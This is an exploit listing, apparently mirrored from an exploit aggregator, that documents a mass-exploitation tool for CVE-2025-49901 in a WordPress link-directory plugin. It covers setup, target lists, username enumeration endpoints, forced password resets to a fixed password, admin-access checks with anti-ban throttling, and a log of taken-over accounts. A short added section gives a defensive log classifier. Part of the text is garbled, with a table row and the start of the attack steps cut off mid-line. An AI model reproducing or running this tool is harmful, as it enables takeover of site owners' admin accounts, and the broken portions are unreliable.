## https://sploitus.com/exploit?id=7733F16C-88C9-5C89-A8E3-D3DFC794B20E
# CVE-2025-49901
The WordPress Simple Link Directory plugin < 14.8.1 is vulnerable to a high-priority Broken Authentication flaw.
```
CVE-2025-49901 · Simple Link Directory · qc-opd
Authentication Bypass → Password Reset → RCE
```

---
## ▸ Vulnerability
| | |
|---|---|
| **CVE** | CVE-2025-49901 |
| **CVSS** | **9.8 CRITICAL** - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **ADP** | CISA-ADP |
| **Plugin** | quantumcloud Simple Link Directory (`qc-simple-link-directory`) |
| **Affected** | All versions **

```
pass=newhackerpass123
_wpnonce=

5. Verify access (dual mode)
   Session mode → cookie check + /wp-admin/ probes
   Password mode → wp-login.php + admin panel check

6. Write confirmed hits → scan_results/reset_mass_success.txt
```
---
## ▸ Setup
```bash
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py
```
**`requirements.txt`**
```
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0
```
---
## ▸ Usage
```
Targets list file → list.txt (one host per line)
Threads → default 5
HTTP timeout → default 10s
Per-user delay MIN/MAX → anti-ban throttle (default 0.3 / 0.7s)
Delay between sites → default 1.0s
Output file → scan_results/reset_mass_success.txt
```
**Targets format:**
```
https://target1.com
target2.com
http://target3.com/wordpress
```
**Fixed password injected for all resets:**
```
newhackerpass123
```
---
## ▸ Username Enumeration Sources
| Method | Endpoint |
|---|---|
| Author redirect | `/?author=1` → `/?author=10` |
| REST API | `/wp-json/wp/v2/users` |
| Hostname | First label of domain as fallback |
| Hardcoded | `admin` always included |
---
## ▸ Admin Verification Logic
After each reset attempt the tool verifies access using **two independent methods**:
```
Session mode → checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode → full wp-login.php POST + multi-path admin panel probe
```
Admin indicators checked:
```
id="adminmenu" · id="wpadminbar" · id="wpwrap"
users.php · plugins.php · plugin-install-tab · upload-plugin
```
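
Seen from the defending side, the enumeration sources and the password-mode verification described above leave an ordered trail in the web server access log: author-ID probes or a REST user listing, then a `wp-login.php` POST, then `/wp-admin/` requests. The following is an added example, not part of the tool or of the original README, that flags this sequence per client IP; the log lines are constructed, and the threshold and verdict names are assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log lines (combined format, documentation-range IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jun/2025:14:22:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "python-requests/2.31.0"
203.0.113.7 - - [01/Jun/2025:14:22:02 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "python-requests/2.31.0"
203.0.113.7 - - [01/Jun/2025:14:22:02 +0000] "GET /?author=3 HTTP/1.1" 404 0 "-" "python-requests/2.31.0"
203.0.113.7 - - [01/Jun/2025:14:22:03 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.7 - - [01/Jun/2025:14:22:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31.0"
203.0.113.7 - - [01/Jun/2025:14:22:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 4096 "-" "python-requests/2.31.0"
198.51.100.20 - - [01/Jun/2025:14:23:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.20 - - [01/Jun/2025:14:25:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR = re.compile(r"[?&]author=(\d+)")
MIN_AUTHOR_IDS = 3  # assumed threshold: distinct author IDs that count as enumeration

def classify(log_text):
    """Return {client_ip: verdict} for clients that enumerate users, then log in."""
    seen = defaultdict(lambda: {"authors": set(), "rest": False, "login": False, "admin": False})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        s = seen[ip]
        enumerated = s["rest"] or len(s["authors"]) >= MIN_AUTHOR_IDS
        author = AUTHOR.search(path)
        if method == "GET" and author:
            s["authors"].add(author.group(1))
        elif method == "GET" and "/wp-json/wp/v2/users" in path:
            s["rest"] = True
        elif method == "POST" and "/wp-login.php" in path and enumerated:
            # wp-login.php typically answers 302 when credentials are accepted, 200 otherwise
            s["login"] = s["login"] or status == "302"
        elif "/wp-admin/" in path and status == "200" and s["login"]:
            s["admin"] = True
    verdicts = {}
    for ip, s in seen.items():
        if s["admin"]:
            verdicts[ip] = "admin-access-after-enumeration"
        elif s["login"]:
            verdicts[ip] = "login-after-enumeration"
        elif s["rest"] or len(s["authors"]) >= MIN_AUTHOR_IDS:
            verdicts[ip] = "user-enumeration"
    return verdicts
```

A verdict of `login-after-enumeration` or higher on an account whose owner did not change the password is the case to escalate; paths are matched as substrings so subdirectory installs are covered.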
---
## ▸ Terminal Output Format
```
[HH:MM:SS] [https://target.com] NONCE: OK | RESET: OK | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: - | ACCESS: 0 HIT
```
---
## ▸ Output File
**`scan_results/reset_mass_success.txt`**
```
[2025-06-01T14:22:10] https://target.com - account=admin pass=newhackerpass123 mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123 mode=session
```
---
## ▸ Author
```
Nxploited (Khaled Alenazi)
GitHub → https://github.com/Nxploited
Telegram → @KNxploited
```
---
## ▸ Disclaimer
```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.
The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.
Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
```
---
© 2025 Nxploited · Simple Link Directory